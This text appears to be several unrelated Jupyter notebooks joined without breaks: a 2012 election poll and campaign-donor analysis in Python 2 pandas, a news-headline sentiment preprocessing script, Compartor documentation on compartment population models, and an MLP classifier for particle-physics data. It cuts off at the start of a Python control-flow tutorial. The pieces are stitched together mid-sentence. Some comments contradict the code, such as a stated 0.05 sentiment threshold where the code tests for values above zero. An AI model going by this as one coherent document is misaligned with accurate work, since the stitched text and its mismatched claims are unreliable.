float64(2), int64(2), object(10) memory usage: 69.0+ KBGreat! 
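Quick note: `from StringIO import StringIO` only works on Python 2; under Python 3 the equivalent class lives in the `io` module. A minimal sketch of the same download step with Python 3 imports (same URL as above, assuming it is still reachable):

```python
import io

import pandas as pd
import requests

url = "http://elections.huffingtonpost.com/pollster/2012-general-election-romney-vs-obama.csv"
source = requests.get(url).text             # fetch the CSV as text
poll_df = pd.read_csv(io.StringIO(source))  # wrap the text in a file-like object for pandas
```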
Now let's get a quick look with .head()# Preview DataFrame poll_df.head()Let's go ahead and get a quick visualization overview of the affiliation for the polls.# Factorplot the affiliation sns.factorplot('Affiliation',data=poll_df)Looks like we are overall relatively neutral, but still leaning towards Democratic Affiliation, it will be good to keep this in mind. Let's see if sorting by the Population hue gives us any further insight into the data.# Factorplot the affiliation by Population sns.factorplot('Affiliation',data=poll_df,hue='Population')Looks like we have a strong showing of likely voters and Registered Voters, so the poll data should hopefully be a good reflection on the populations polled. Let's take another quick overview of the DataFrame.# Let's look at the DataFrame again poll_df.head()Let's go ahead and take a look at the averages for Obama, Romney , and the polled people who remained undecided.# First we'll get the average avg = pd.DataFrame(poll_df.mean()) avg.drop('Number of Observations',axis=0,inplace=True) # After that let's get the error std = pd.DataFrame(poll_df.std()) std.drop('Number of Observations',axis=0,inplace=True) # now plot using pandas built-in plot, with kind='bar' and yerr='std' avg.plot(yerr=std,kind='bar',legend=False)Interesting to see how close these polls seem to be, especially considering the undecided factor. Let's take a look at the numbers.# Concatenate our Average and Std DataFrames poll_avg = pd.concat([avg,std],axis=1) #Rename columns poll_avg.columns = ['Average','STD'] #Show poll_avgLooks like the polls indicate it as a fairly close race, but what about the undecided voters? Most of them will likely vote for one of the candidates once the election occurs. If we assume we split the undecided evenly between the two candidates the observed difference should be an unbiased estimate of the final difference.# Take a look at the DataFrame again poll_df.head()If we wanted to, we could also do a quick (and messy) time series analysis of the voter sentiment by plotting Obama/Romney favor versus the Poll End Dates. Let's take a look at how we could quickly do tht in pandas. Note: The time is in reverse chronological order. Also keep in mind the multiple polls per end date.# Quick plot of sentiment in the polls versus time. poll_df.plot(x='End Date',y=['Obama','Romney','Undecided'],marker='o',linestyle='')While this may give you a quick idea, go ahead and try creating a new DataFrame or editing poll_df to make a better visualization of the above idea! To lead you along the right path for plotting, we'll go ahead and answer another question related to plotting the sentiment versus time. Let's go ahead and plot out the difference between Obama and Romney and how it changes as time moves along. Remember from the last data project we used the datetime module to create timestamps, let's go ahead and use it now.# For timestamps from datetime import datetimeNow we'll define a new column in our poll_df DataFrame to take into account the difference between Romney and Obama in the polls.# Create a new column for the difference between the two candidates poll_df['Difference'] = (poll_df.Obama - poll_df.Romney)/100 # Preview the new column poll_df.head()Great! Keep in mind that the Difference column is Obama minus Romney, thus a positive difference indicates a leaning towards Obama in the polls. Now let's go ahead and see if we can visualize how this sentiment in difference changes over time. 
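Before moving on, here is a small sketch of the even-split assumption mentioned earlier (the adjusted series are illustrative additions, not part of the original notebook): giving each candidate half of the Undecided share shifts both shares by the same amount, so the Obama-minus-Romney difference is unchanged.

```python
# Illustrative even split of the undecided share (assumes poll_df from above).
obama_adj = poll_df['Obama'] + poll_df['Undecided'].fillna(0) / 2
romney_adj = poll_df['Romney'] + poll_df['Undecided'].fillna(0) / 2

# The adjusted gap matches the raw gap, so the even split does not move the estimate.
print(((obama_adj - romney_adj) - (poll_df['Obama'] - poll_df['Romney'])).abs().max())  # ~0.0
```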
We will start by using groupby to group the polls by their Start Date and then sorting by that Start Date.# Set as_index=False to keep the 0,1,2,... index. Then we'll take the mean of the polls on that day. poll_df = poll_df.groupby(['Start Date'],as_index=False).mean() # Let's go ahead and see what this looks like poll_df.head()Great! Now plotting the Difference versus time should be straightforward.# Plotting the difference in polls between Obama and Romney fig = poll_df.plot('Start Date','Difference',figsize=(12,4),marker='o',linestyle='-',color='purple')It would be very interesting to plot marker lines on the dates of the debates and see if there is any general insight into the poll results.The debate dates were Oct 3rd, Oct 11th, and Oct 22nd. Let's plot some lines as markers and then zoom in on the month of October. In order to find where to set the x limits for the figure we need to find out where the index for the month of October 2012 is. Here's a simple for loop to find those rows. Note: the string format of the date makes this difficult to do without using a lambda expression or a map.# Set row count and xlimit list row_in = 0 xlimit = [] # Cycle through dates until 2012-10 is found, then print row index for date in poll_df['Start Date']: if date[0:7] == '2012-10': xlimit.append(row_in) row_in +=1 else: row_in += 1 print min(xlimit) print max(xlimit)329 356Great, now we know where to set our x limits for the month of October in our figure.# Start with original figure fig = poll_df.plot('Start Date','Difference',figsize=(12,4),marker='o',linestyle='-',color='purple',xlim=(329,356)) # Now add the debate markers plt.axvline(x=329+2, linewidth=4, color='grey') plt.axvline(x=329+10, linewidth=4, color='grey') plt.axvline(x=329+21, linewidth=4, color='grey')Surprisingly, these polls reflect a dip for Obama after the second debate against Romney, even though memory serves that he performed much worse against Romney during the first debate. For all these polls it is important to remember how geographical location can affect the value of a poll in predicting the outcome of a national election. Donor Data SetLet's go ahead and switch gears and take a look at a data set consisting of information on donations to the federal campaign. This is going to be the biggest data set we've looked at so far. You can download it [here](https://www.dropbox.com/s/l29oppon2veaq4n/Election_Donor_Data.csv?dl=0), then make sure to save it to the same folder your iPython Notebooks are in.The questions we will be trying to answer while looking at this data set are: 1.) How much was donated and what was the average donation? 2.) How did the donations differ between candidates? 3.) How did the donations differ between Democrats and Republicans? 4.) What were the demographics of the donors? 5.) Is there a pattern to donation amounts?# Set the DataFrame as the csv file donor_df = pd.read_csv('Election_Donor_Data.csv') # Get a quick overview donor_df.info() # let's also just take a glimpse donor_df.head()What might be interesting to do is get a quick glimpse of the donation amounts and the average donation amount. Let's go ahead and break down the data.# Get a quick look at the various donation amounts donor_df['contb_receipt_amt'].value_counts()8079 different amounts! That's quite a variation.
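As a small, optional check on that claim (a sketch using the same `contb_receipt_amt` column; it also previews the mean and std computed in the next cell):

```
# Sketch: summarize the donation amounts numerically
print donor_df['contb_receipt_amt'].nunique()   # number of distinct donation amounts
print donor_df['contb_receipt_amt'].describe()  # count, mean, std, min/max, quartiles
```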
Let's look at the average and the std.# Get the mean donation don_mean = donor_df['contb_receipt_amt'].mean() # Get the std of the donation don_std = donor_df['contb_receipt_amt'].std() print 'The average donation was %.2f with a std of %.2f' %(don_mean,don_std)The average donation was 298.24 with a std of 3749.67Wow! That's a huge standard deviation! Let's see if there are any large donations or other factors messing with the distribution of the donations.# Let's make a Series from the DataFrame, use .copy() to avoid view errors top_donor = donor_df['contb_receipt_amt'].copy() # Now sort it top_donor.sort() # Then check the Series top_donorLooks like we have some negative values, as well as some huge donation amounts! The negative values are due to the FEC recording refunds as well as donations, let's go ahead and only look at the positive contribution amounts# Get rid of the negative values top_donor = top_donor[top_donor >0] # Sort the Series top_donor.sort() # Look at the top 10 most common donations value counts top_donor.value_counts().head(10)Here we can see that the top 10 most common donations ranged from 10 to 2500 dollars. A quick question we could verify is if donations are usually made in round number amounts? (e.g. 10,20,50,100,500 etc.) We can quickly visualize this by making a histogram and checking for peaks at those values. Let's go ahead and do this for the most common amounts, up to 2500 dollars.# Create a Series of the common donations limited to 2500 com_don = top_donor[top_donor < 2500] # Set a high number of bins to account for the non-round donations and check histogram for spikes. com_don.hist(bins=100)Looks like our intuition was right, since we spikes at the round numbers. Let's dive deeper into the data and see if we can seperate donations by Party, in order to do this we'll have to figure out a way of creating a new 'Party' column. We can do this by starting with the candidates and their affliliation. Now let's go ahead and get a list of candidates# Grab the unique object from the candidate column candidates = donor_df.cand_nm.unique() #Show candidatesLet's go ahead and seperate Obama from the Republican Candidates by adding a Party Affiliation column. We can do this by using map along a dictionary of party affiliations. Lecture 36 has a review of this topic.# Dictionary of party affiliation party_map = {'': 'Republican', '': 'Republican', '': 'Republican', '': 'Republican', '': 'Republican', '': 'Republican', 'Obama, Barack': 'Democrat', '': 'Republican', '': 'Republican', '': 'Republican', ". 'Buddy' III": 'Republican', '': 'Republican', '': 'Republican'} # Now map the party with candidate donor_df['Party'] = donor_df.cand_nm.map(party_map)A quick note, we could have done this same operation manually using a for loop, however this operation would be much slower than using the map method.''' for i in xrange(0,len(donor_df)): if donor_df['cand_nm'][i] == 'Obama,Barack': donor_df['Party'][i] = 'Democrat' else: donor_df['Party'][i] = 'Republican' '''Let's look at our DataFrame and also make sure we clear refunds from the contribution amounts.# Clear refunds donor_df = donor_df[donor_df.contb_receipt_amt >0] # Preview DataFrame donor_df.head()Let's start by aggregating the data by candidate. We'll take a quick look a the total amounts received by each candidate. 
First we will look at the total number of donations and then at the total amount.# Groupby candidate and then display the total number of people who donated donor_df.groupby('cand_nm')['contb_receipt_amt'].count()Clearly Obama is the front-runner in number of people donating, which makes sense, since he is not competing with any other Democratic nominees. Let's take a look at the total dollar amounts.# Groupby candidate and then display the total amount donated donor_df.groupby('cand_nm')['contb_receipt_amt'].sum()This isn't super readable, and an important aspect of data science is to clearly present information. Let's go ahead and just print out these values in a clean for loop.# Start by setting the groupby as an object cand_amount = donor_df.groupby('cand_nm')['contb_receipt_amt'].sum() # Our index tracker i = 0 for don in cand_amount: print " The candidate %s raised %.0f dollars " %(cand_amount.index[i],don) print '\n' i += 1The candidate raised 2711439 dollars The candidate raised 7101082 dollars The candidate raised 12832770 dollars The candidate raised 3330373 dollars The candidate Johnson, raised 566962 dollars The candidate McCotter, raised 39030 dollars The candidate raised 135877427 dollars The candidate raised 21009620 dollars The candidate raised 6004819 dollars The candidate raised 20305754 dollars The candidate Roemer, . 'Buddy' III raised 373010 dollars The candidate raised 88335908 dollars The candidate raised 11043159 dollarsThis is okay, but it's hard to do a quick comparison just by reading this information. How about a quick graphic presentation?# Plot out total donation amounts cand_amount.plot(kind='bar')Now the comparison is very easy to see. As we saw before, clearly Obama is the front-runner in donation amounts, which makes sense, since he is not competing with any other Democratic nominees. How about we just compare Democrat versus Republican donations?# Groupby party and then sum donations donor_df.groupby('Party')['contb_receipt_amt'].sum().plot(kind='bar')Looks like Obama couldn't compete against all the Republicans combined, but he certainly has the advantage of their funding being splintered across multiple candidates. Finally, to start closing out the project, let's look at donations and who they came from (as far as occupation is concerned). We will start by grabbing the occupation information from the donor_df DataFrame and then using pivot_table to make the index the various occupations and the columns the Party (Republican or Democrat). Finally, we'll also pass an aggregation function to the pivot table; in this case a simple sum function will add up all the contributions by anyone with the same profession.# Use a pivot table to extract and organize the data by the donor occupation occupation_df = donor_df.pivot_table('contb_receipt_amt', index='contbr_occupation', columns='Party', aggfunc='sum') # Let's go ahead and check out the DataFrame occupation_df.head()Great! Now let's see how big the DataFrame is.# Check size occupation_df.shapeWow! This is probably far too large to display effectively with a small, static visualization. What we should do is have a cut-off for total contribution amounts. After all, small donations of 20 dollars by one type of occupation won't give us too much insight. So let's set our cut-off at 1 million dollars.# Set a cut-off point at 1 million dollars of sum contributions occupation_df = occupation_df[occupation_df.sum(1) > 1000000] # Now let's check the size! occupation_df.shapeGreat!
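For reference, here is a hedged sketch of an equivalent way to build the same occupation-by-party table with `groupby` instead of `pivot_table` (the `occupation_alt` name is just for illustration; it should match the `occupation_df` produced above):

```
# Sketch: groupby + unstack as an alternative to pivot_table
occupation_alt = donor_df.groupby(['contbr_occupation','Party'])['contb_receipt_amt'].sum().unstack('Party')

# Apply the same 1 million dollar cut-off on the row totals
occupation_alt = occupation_alt[occupation_alt.sum(axis=1) > 1000000]
occupation_alt.shape
```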
This looks much more manageable! Now let's visualize it.# Plot out with pandas occupation_df.plot(kind='bar')This is a bit hard to read, so let's use kind='barh' (horizontal) to put the occupation on the correct axis.# Horizontal plot, use a conveniently colored cmap occupation_df.plot(kind='barh',figsize=(10,12),cmap='seismic')Looks like there are some occupations that are either mislabeled or aren't really occupations. Let's get rid of the 'Information Requested' occupations and combine CEO and C.E.O.# Drop the unavailable occupations occupation_df.drop(['INFORMATION REQUESTED PER BEST EFFORTS','INFORMATION REQUESTED'],axis=0,inplace=True)Now let's combine the CEO and C.E.O. rows.# Set the new CEO row as the sum of the current two occupation_df.loc['CEO'] = occupation_df.loc['CEO'] + occupation_df.loc['C.E.O.'] # Drop the old C.E.O. row occupation_df.drop('C.E.O.',inplace=True)Now let's repeat the same plot!# Repeat previous plot! occupation_df.plot(kind='barh',figsize=(10,12),cmap='seismic')About the dataThe given dataset contains a large number of news article headlines mapped together with their sentiment scores and their respective social feedback on multiple platforms. The collected data accounts for about 93,239 news items on four different topics: Economy, Microsoft, Obama and Palestine. (UCI Machine Learning Repository, n.d.)The attributes present in the dataset are:- **IDLink (numeric):** Unique identifier of news items- **Title (string):** Title of the news item according to the official media sources- **Headline (string):** Headline of the news item according to the official media sources- **Source (string):** Original news outlet that published the news item- **Topic (string):** Query topic used to obtain the items in the official media sources- **PublishDate (timestamp):** Date and time of the news items' publication- **SentimentTitle (numeric):** Sentiment score of the text in the news items' title- **SentimentHeadline (numeric):** Sentiment score of the text in the news items' headline- **Facebook (numeric):** Final value of the news items' popularity according to the social media source Facebook- **GooglePlus (numeric):** Final value of the news items' popularity according to the social media source Google+- **LinkedIn (numeric):** Final value of the news items' popularity according to the social media source LinkedInFor this project only the Headline and SentimentHeadline attributes will be used, and news related to Microsoft will be removed as it is more tech-centric and quite irrelevant in the context of Nepal.# Drop data with neutral sentiment news_df = news_df[news_df['SentimentHeadline'] != 0] # Data with positive sentiment news_df[news_df['SentimentHeadline'] > 0].shape # Data with negative sentiment news_df[news_df['SentimentHeadline'] < 0].shapeIt seems there is almost three times as much negative news as positive news (when counting neutral news as negative).
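To make that comparison explicit, a possible sketch (using the same `SentimentHeadline` column; the neutral headlines were already dropped above) is:

```
import numpy as np

# Sketch: share of negative (-1.0) vs. positive (1.0) headline sentiment
sign_shares = np.sign(news_df['SentimentHeadline']).value_counts(normalize=True)
print(sign_shares)
```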
Data Preprocessing#Dropping news related to microsoft news_df = news_df[news_df['Topic'] != "microsoft"] #Removing the irreleant columns news_df = news_df[['Headline', 'SentimentHeadline']] news_df.info() # In general sentiment score above 0.05 are considered positive # And since we are only interested in filtering good news or positive news # We will label score above 0.05 as postive and any score below it as negative def is_positive(sentiment_score): if sentiment_score > 0: return 1 else: return 0 news_df['Is_SentimentHeadline_Positive'] = news_df['SentimentHeadline'].apply(is_positive) # Removing SentimentHeadline column news_df = news_df[['Headline','Is_SentimentHeadline_Positive']] news_df.head()Text Preprocessing# Removing Punctuations and converting all word to lowercase import string import nltk def remove_proper_noun(text): text = nltk.tag.pos_tag(text.split()) edited_text = [word for word,tag in text if tag != 'NNP' and tag != 'NNPS'] return ' '.join(edited_text) def remove_punctuation(text): text = remove_proper_noun(text) no_punctuation_text = ''.join([i for i in str(text) if i not in string.punctuation]) return no_punctuation_text.lower() news_df['Headline'] = news_df['Headline'].apply(remove_punctuation) news_df.head() import spacy nlp = spacy.load("en_core_web_sm") import re def remove_nonwords(str_): return re.sub("[^A-Za-z ]\w+[^A-Za-z]*", ' ', str_) # Lemmatization and Removing stop words and non words def text_preprocessing(text): text = remove_nonwords(text) tokenized_text = [token.lemma_ for token in nlp(text)] no_stopwords_list = [i.lower() for i in tokenized_text if i not in nlp.Defaults.stop_words] lemma_text = ' '.join(no_stopwords_list) return lemma_text # Preprocessing the Headline text news_df['Headline'] = news_df['Headline'].apply(text_preprocessing) news_df.head() # Removing all Null news_df = news_df[news_df['Headline'].notnull()] # Dropping all Nan news_df = news_df.dropna() # dropping ALL duplicte values news_df.drop_duplicates(subset ="Headline", keep = False, inplace = True) news_df.to_csv("../Data/Clean_data.csv", index=False)How to define a compartment population model in Compartor $$\def\n{\mathbf{n}}\def\x{\mathbf{x}}\def\N{\mathbb{\mathbb{N}}}\def\X{\mathbb{X}}\def\NX{\mathbb{\N_0^\X}}\def\C{\mathcal{C}}\def\Jc{\mathcal{J}_c}\def\DM{\Delta M_{c,j}}\newcommand\diff{\mathop{}\!\mathrm{d}}\def\Xc{\mathbf{X}_c}\def\Yc{\mathbf{Y}_c}\newcommand{\muset}[1]{\dot{\{}1\dot{\}}}$$ Whenever using Compartor in a Jupyter notebook, run the following commands:# initialize sympy printing (for latex output) from sympy import init_printing, Symbol init_printing() # import functions and classes for compartment models from compartor import *Usage of the constructor TransitionClassThe population dynamics are specified in Compartor through a set of transition classes. These are stoichiometric-like equations whose left-hand and right-hand sides specify how some `Compartments` are modified by the occurrence of a transition.To define a compartment $[\x]$, it is first necessary to define some `Content` variables $\x \in \N_0^D$ that Compartor can interpret as symbols on which to perform symbolic computation. For instance,x = Content('x') y = Content('y') Compartment(x)Content variables are $D$-dimensional, with `x[d]` denoting the copy number of chemical species `d`, for $d=0,1,...,D-1$ .Once some content variables have been defined, the fastest way to define a transition class is the constructor `TransitionClass`. 
For instance,Exit = TransitionClass( [x] -to> {}, 'k_E', name='E') display(Exit)defines a transition class that randomly removes one compartment from the population with rate $k_E$. In particular:* The first argument of `TransitionClass` is the compartment stoichiometry, where lelf-hand side and right-hand side are separated by the keyword `-to>`. The notation `[x]` denotes a compartment of content `x`, while `{}` denotes the empty set.* The second argument assignes a name to the rate constant * The optional parameter `name` defines the subscript of the transition propensity Similarly, we can define a transition class that randomly fuses two compartments as followsFusion = TransitionClass( [x] + [y] -to> [x+y], 'k_F', name='F') display(Fusion)Note that the population dependency of the propensity `h` is automatically inferred with the law of mass action. Note that in the compartment notation we can use compound expressions inside compartment brackets. In the above example, we have used `x+y` to denote the content formed by adding content vectors `x` and `y`.Content vectors can be also notated explicitly as $D$-tuples, listing the copy number of each chemical species $d=0,1,...,D-1$.For example, in the expression `[x + (-1, 0)]`, the tuple `(-1, 0)` denotes a change by $-1$ in chemical species $d=0$ (in a model with $D=2$ species). The expression could be equivalently written as `[(x[0]-1,x[1])]`. We will see more examples of this notation below. Propensities with content dependencyIt is possible to tune the propensity as a function of the compartment contents by providing a third argument to `TransitionClass`, such as for the following chemical events given in the example of the paper:Conversion = TransitionClass( [x] -to> [x + (-1,1)], 'k_c', x[0], name='c') Degradation = TransitionClass( [x] -to> [x + (0,-1)], 'k_d', x[1], name='d') display(Conversion, Degradation)The Conversion class transforms the first chemical species (indexed by `0`) to the second type with propensity $k_cx_0$ in any compartment across the population. The Degradation class, instead, removes one molecule of the second chemical species with rate $k_dx_1$, for a given compartment. Some transition classes involve compartments on the product side (i.e. right-hand side) whose content is drawn in probabilistic fashion with respect to the reactant compartments. In such cases, a conditional distribution can be passed as optional argument `pi` in `TransitionClass`. The type of $\pi$ is `OutcomeDistribution`, which is a class comprising* an expression or symbol to use for displaying $\pi$ in compound expressions* a function `expectation` that takes an expression over reactant contents, and returns its expectation over all product compartment variables.There are generators for several predefined outcome distributions. If nothing is specified, as in the above "Exit" transition example, `OutcomeDistribution.Identity()` is used by default. 
Instead, when the content of product compartments follows a distribution, other generators can be used or created.Compartor currently includes the following `OutcomeDistribution` generators* `Poisson()` * `NegativeBinomial()` * `Uniform()` For example, the model in the paper has an "Intake" transition class where new compartments are created with Poisson-distributed contentfrom sympy import Symbol pi_I = OutcomeDistribution.Poisson(Symbol('\pi_{I}(y; \lambda)'),y[0],Symbol('\lambda')) Intake = TransitionClass( {} -to> [(y[0],0)], 'k_I', pi=pi_I, name='I') display(Intake)Model definitionThe declaration of a model consists in defining a list of transition classes. We provide some examples of model declaration here below. Example: case study shown in the paperx = Content('x') y = Content('y') # Intake Distribution pi_I = OutcomeDistribution.Poisson(Symbol('\pi_{I}(y; \lambda)'),y[0],Symbol('\lambda')) Intake = TransitionClass( {} -to> [(y[0],0)], 'k_I', pi=pi_I, name='I') Fusion = TransitionClass( [x] + [y] -to> [x+y], 'k_F', name='F') Conversion = TransitionClass( [x] -to> [x + (-1,1)], 'k_c', x[0], name='c') Degradation = TransitionClass( [x] -to> [x + (0,-1)], 'k_d', x[1], name='d') transitions = [ Intake, Fusion, Conversion, Degradation]The transition classes stored into the variable `transitions` can be displayed with the function `display_transition_classes()` as followsdisplay_transition_classes(transitions)Example: nested birth-death processx = Content('x') y = Content('y') # Intake pi_I = OutcomeDistribution.NegativeBinomial(Symbol('\pi_{NB}(y; \lambda)'), y[0],Symbol('r'),Symbol('p')) Intake = TransitionClass( {} -to> [y], 'k_I', pi=pi_I, name='I') Exit = TransitionClass( [x] -to> {}, 'k_E', name='E') Birth = TransitionClass( [x] -to> [x+1], 'k_b', name='b') Death = TransitionClass( [x] -to> [x-1], 'k_d', x[0], name='d') transitions = [Intake, Exit, Birth, Death] display_transition_classes(transitions)Example: coagulation-fragmentation system with intake and exportx = Content('x') y = Content('y') pi_I = OutcomeDistribution.Poisson(Symbol("\pi_{Poiss}(y; \lambda)"), y[0], Symbol("\lambda")) pi_F = OutcomeDistribution.Uniform(Symbol("\pi_F(y|x)"), y[0], 0, x[0]) Intake = TransitionClass( {} -to> [y], 'k_I', pi=pi_I, name='I') Exit = TransitionClass( [x] -to> {}, 'k_E', name='E') Coagulation = TransitionClass( [x] + [y] -to> [x+y], 'k_C', name='C') Fragmentation = TransitionClass( [x] -to> [y] + [x-y], 'k_F', g=x[0], pi=pi_F, name='F') transitions = [Intake, Exit, Coagulation, Fragmentation] display_transition_classes(transitions)Task 2from sklearn.externals import joblib from scipy.stats import ks_2samp import numpy as np import datetime from sklearn.neural_network import MLPClassifier def getData(signal_filename, backgorund_filename): """ :return: shuffled data """ sig_data = np.asarray(joblib.load(signal_filename)) bkg_data = np.asarray(joblib.load(backgorund_filename)) np.random.shuffle(sig_data) np.random.shuffle(bkg_data) return sig_data, bkg_data class Data: def __init__(self, trainFraction, feature1_idx, feature2_idx, sigLabel=-1, bkgLabel=1, signal_filename='./HEPDrone/data/signal_data.p', backgorund_filename='./HEPDrone/data/background_data.p'): """ :param trainFraction: float in (0,1) :param feature1_idx: int in [0,5] :param feature2_idx: int in [0,5] :param sigLabel :param bkgLabel """ sig_data, bkg_data = getData(signal_filename, backgorund_filename) cutIndex = int(trainFraction * len(sig_data)) self._sigTrain = sig_data[: cutIndex,:] np.random.shuffle(self._sigTrain) 
self._sigTest = sig_data[cutIndex:,:] self._bkgTrain = bkg_data[: cutIndex] np.random.shuffle(self._bkgTrain) self._bkgTest = bkg_data[cutIndex:,:] self._sigLabel = sigLabel self._bkgLabel = bkgLabel self._feature1_idx = feature1_idx self._feature2_idx = feature2_idx def set_feature_indexes(self, feature1_idx, feature2_idx): self._feature1_idx = feature1_idx self._feature2_idx = feature2_idx def shuffle(self): np.random.shuffle(self._sigTrain) np.random.shuffle(self._bkgTrain) def get_sigTrain(self): return self._sigTrain[:, (self._feature1_idx, self._feature2_idx)] def get_sigTest(self): return self._sigTest[:, (self._feature1_idx, self._feature2_idx)] def get_bkgTrain(self): return self._bkgTrain[:, (self._feature1_idx, self._feature2_idx)] def get_bkgTest(self): return self._bkgTest[:, (self._feature1_idx, self._feature2_idx)] def get_sigLabel(self): return self._sigLabel def get_bkgLabel(self): return self._bkgLabel class Trainer: @staticmethod def train(hidden_layer_sizes, lr_init, dataObject, verbose): """ Trains a classifier :param hidden_layer_sizes: tuple of zies: (100, 100) :param lr_init: initial learning rate: 0.3 :return classifier """ mlp = MLPClassifier(activation='relu', alpha=1e-05, batch_size=200, beta_1=0.9, beta_2=0.999, epsilon=1e-08, hidden_layer_sizes=hidden_layer_sizes, learning_rate_init=lr_init, random_state=1, shuffle=True, solver='adam', tol=0.00001, early_stopping=False, validation_fraction=0.1, verbose=verbose, warm_start=False) X = np.append(dataObject.get_sigTrain(), dataObject.get_bkgTrain(), axis=0) y = [dataObject.get_sigLabel()] * len(dataObject.get_sigTrain()) + [dataObject.get_bkgLabel()] * len(dataObject.get_bkgTrain()) mlp.fit(X, y) return mlp @staticmethod def evaluate(classifier, dataObject, verbose): """ :param classifier: MLPClassifier :return: test_accuracy """ if len(dataObject.get_sigTrain()) != 0: predictions = [] for entry in dataObject.get_sigTrain(): predictions.append(classifier.predict([entry])[0]) train_accuracy = predictions.count(dataObject.get_sigLabel()) / float(len(predictions)) predictions = [] for entry in dataObject.get_sigTest(): predictions.append(classifier.predict([entry])[0]) test_accuracy_sig = predictions.count(dataObject.get_sigLabel()) / float(len(predictions)) if verbose: if len(dataObject.get_sigTrain()) != 0: print "Signal train accuracy: " + str(train_accuracy) print "Signal test accuracy: " + str(test_accuracy_sig) if len(dataObject.get_bkgTrain()) != 0: predictions = [] for entry in dataObject.get_bkgTrain(): predictions.append(classifier.predict([entry])[0]) train_accuracy = predictions.count(dataObject.get_bkgLabel()) / float(len(predictions)) predictions = [] for entry in dataObject.get_bkgTest(): predictions.append(classifier.predict([entry])[0]) test_accuracy_bkg = predictions.count(dataObject.get_bkgLabel()) / float(len(predictions)) if verbose: if len(dataObject.get_bkgTrain()) != 0: print "Background train accuracy: " + str(train_accuracy) print "Background test accuracy: " + str(test_accuracy_bkg) return (test_accuracy_bkg+test_accuracy_sig) / 2 @staticmethod def predict_test_data(classifier, dataObject, verbose): """ :param classifier: MLPClassifier :return: test_accuracy """ testSample = [] predictions_signal = [] for entry in dataObject.get_sigTest(): probability = float(classifier.predict_proba([entry])[0][0]) predictions_signal.append(classifier.predict([entry])[0]) testSample.append(probability) test_accuracy_sig = predictions_signal.count(dataObject.get_sigLabel()) / float(len(predictions_signal)) 
if verbose: print "Signal test accuracy: " + str(test_accuracy_sig) testSample = [] predictions_background = [] for entry in dataObject.get_bkgTest(): probability = float(classifier.predict_proba([entry])[0][0]) predictions_background.append(classifier.predict([entry])[0]) testSample.append(probability) test_accuracy_bkg = predictions_background.count(dataObject.get_bkgLabel()) / float(len(predictions_background)) if verbose: print "Background test accuracy: " + str(test_accuracy_bkg) return (test_accuracy_bkg+test_accuracy_sig) / 2, predictions_signal, dataObject._sigTest, predictions_background, dataObject._bkgTest @staticmethod def saveClassifier(classifier, filename): joblib.dump(classifier, filename ) print 'Classifier saved to file' @staticmethod def loadClassifier(filename): classifier = joblib.load(filename ) return classifier def train_N(N, layer_sizes, lr_init, dataObject, verbose): accuracy_setting_history = [] for _ in range(N): classifier = Trainer.train(layer_sizes,lr_init, dataObject, verbose) accuracy = Trainer.evaluate(classifier, dataObject, verbose) accuracy_setting_history.append(accuracy) candidate = sum(accuracy_setting_history)/N return classifier, candidate def hyperparameter_search(): trainFraction_ = 0.5 hidden_layer_sizes_ = (100, 100) lr_init_ = 0.3 histories_indexes_ = [] best_average_accuracy_ = 0 best_feature1_idx_ = -1 best_feature2_idx_ = -1 dataObject_ = Data(trainFraction_, best_feature1_idx_, best_feature2_idx_) for feature1_idx_ in range(6): for feature2_idx_ in range(feature1_idx_+1, 6): dataObject_.set_feature_indexes(feature1_idx_, feature2_idx_) _, candidate_ = train_N(1, hidden_layer_sizes_, lr_init_, dataObject_, verbose=False) dataObject_.shuffle() if candidate_ > best_average_accuracy_: best_average_accuracy_ = candidate_ best_feature1_idx_ = feature1_idx_ best_feature2_idx_ = feature2_idx_ histories_indexes_.append([feature1_idx_, feature2_idx_, candidate_]) print(histories_indexes_) #print "(feature1, feature2, AP)" #print histories_indexes_ print "Best feature indexes "+ str(best_feature1_idx_) + " " + str(best_feature2_idx_) #print "Best accuracy " + str(best_average_accuracy_) network_dims_ = [(200, 200), (10,10), (20,20,20,20), (100, 40, 20, 10)] histories_hidden_sizes_ = [] best_sizes_ = None best_average_accuracy_ = 0 dataObject_.set_feature_indexes(best_feature1_idx_, best_feature2_idx_) for hidden_sizes_ in network_dims_: _, candidate_ = train_N(1, hidden_sizes_, lr_init_, dataObject_, verbose=False) dataObject_.shuffle() if candidate_ > best_average_accuracy_: best_average_accuracy_ = candidate_ best_sizes_ = hidden_sizes_ histories_hidden_sizes_.append([hidden_sizes_, candidate_]) print(histories_hidden_sizes_) #print "((hidden layer sizes), AP)" #print histories_hidden_sizes_ print "Best hidden layer size " + str(best_sizes_) return best_feature1_idx_, best_feature2_idx_, best_sizes_1. 
Training a Input Model ( Neural Network that is taught on the signal ) Skip following 3 cells if you don't wanna train and search hyperparametersbest_feature1_idx_, best_feature2_idx_, best_sizes_ = hyperparameter_search() print (best_feature1_idx_, best_feature2_idx_, best_sizes_) def save_best_model(train_fraction, best_feature1_idx_, best_feature2_idx_, best_sizes_, signal_filename_,background_filename_, lr_init_): dataObject_ = Data(train_fraction_, best_feature1_idx_, best_feature2_idx_, signal_filename=signal_filename_,backgorund_filename=background_filename_) dataObject_.set_feature_indexes(best_feature1_idx_, best_feature2_idx_) best_classifier_ = Trainer.train(best_sizes_, lr_init_, dataObject_, verbose=False) best_accuracy_ = Trainer.evaluate(best_classifier_, dataObject_, verbose=False) print "Best model accuracy: " + str(best_accuracy_) Trainer.saveClassifier(best_classifier_,'best_classifier2_aux.pkl') signal_filename_ = './HEPDrone/data/signal_data.p' background_filename_ = './HEPDrone/data/background_data.p' train_fraction_ = 0.95 lr_init_ = 0.3 best_sizes_ = (200, 200) save_best_model(train_fraction_, best_feature1_idx_, best_feature2_idx_, best_sizes_, signal_filename_,background_filename_, lr_init_)Best model accuracy: 0.899 Classifier saved to fileRun from here if you want to evaluate best model on new data with the same format the filenames with filepaths should be sent as parameters: signal file path, background file pathdef evaluate_best_classifier_on_new_data(signal_filename, backgorund_filename, classifier_filename): dataObject_ = Data(trainFraction=0, feature1_idx=2, feature2_idx=3, signal_filename=signal_filename, backgorund_filename=backgorund_filename) loaded_class_ = Trainer.loadClassifier(classifier_filename) accuracy_ = Trainer.evaluate(loaded_class_, dataObject_, verbose=True) print "Accuracy: "+str(accuracy_) evaluate_best_classifier_on_new_data('./HEPDrone/data/signal_data.p', './HEPDrone/data/background_data.p', 'best_classifier2_aux.pkl')Signal test accuracy: 0.9286 Background test accuracy: 0.8659 Accuracy: 0.89725More Control Flow ToolsCopied codes from [Python tutorial](https://docs.python.org/3/tutorial/controlflow.html). `if` Statementsx = int(input("Please enter an integer: ")) if x < 0: x = 0 print('Negative changed to zero') elif x == 0: 